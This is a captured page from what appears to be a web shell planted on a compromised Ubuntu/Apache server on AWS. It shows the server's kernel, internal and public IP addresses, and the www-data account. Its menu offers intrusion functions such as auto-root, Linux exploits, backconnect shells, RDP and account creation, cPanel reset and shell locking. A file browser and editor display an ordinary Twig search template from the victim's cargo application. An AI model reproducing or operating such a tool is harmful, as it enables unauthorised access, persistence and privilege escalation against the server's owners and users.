Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 3.144.101.157
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
boaz /
templates /
cargo /
[ HOME SHELL ]
Name
Size
Permission
Action
depot.html.twig
1.19
KB
-rw-rw-r--
depots.html.twig
2.33
KB
-rw-rw-r--
edit.html.twig
2.54
KB
-rw-rw-r--
googleda794cd9937527d01.html
34
B
-rw-r--r--
list.html.twig
1.42
KB
-rw-rw-r--
search.html.twig
1.9
KB
-rw-rw-r--
subcargo.html.twig
1.17
KB
-rw-rw-r--
view.html.twig
4.79
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : search.html.twig
{% extends 'base1.html.twig' %} {% block content %} <div class="searchbar"> <form class="form-inline" action="{{ path('searchCargo') }}" method="GET"> <label for="search">Search Cargo By</label> <select name="search" id="search" class="form-control" onchange="play();"> <option value="seller">Seller</option> <option value="product">Product</option> <option value="date">Date</option> </select> <input name="query" class="search form-control" type="text" placeholder="Search" id="query"> <div id="fromTo" style="display: none; padding: 10px 0;"> <input class="search form-control" name="from" type="text" placeholder="From" id="datepicker"> <input class="search form-control" name="to" type="text" placeholder="To" id="to"> </div> <input type="submit" value="Submit" class="btn btn-default"> </form> </div> <div class="releaseTable"> <table class="table" data-sort="table"> <thead> <tr> <th colspan="3">Name</th> <th></th> <th></th> </tr> </thead> <tbody> {% if cargo %} {% for item in cargo %} <tr> <td colspan="3"><a href="{{ path('viewCargo', {'id': item.id}) }}">{{ item.cargoname }}</a></td> <td><a href="{{ path('editCargo', {'id': item.id}) }}">Edit</a></td> <td><a href="#">Delete</a></td> </tr> {% endfor %} {% endif %} </tbody> </table> </div> {% endblock %} {% block javascript %} {{ parent() }} <script type="text/javascript"> var search = document.getElementById('search'); function play(){ if(search.value === 'date'){ document.getElementById('query').style.display = 'none'; document.getElementById('fromTo').style.display = 'block'; }else { document.getElementById('query').style.display = 'inline-block'; document.getElementById('fromTo').style.display = 'none'; } } </script> {% endblock %}
Close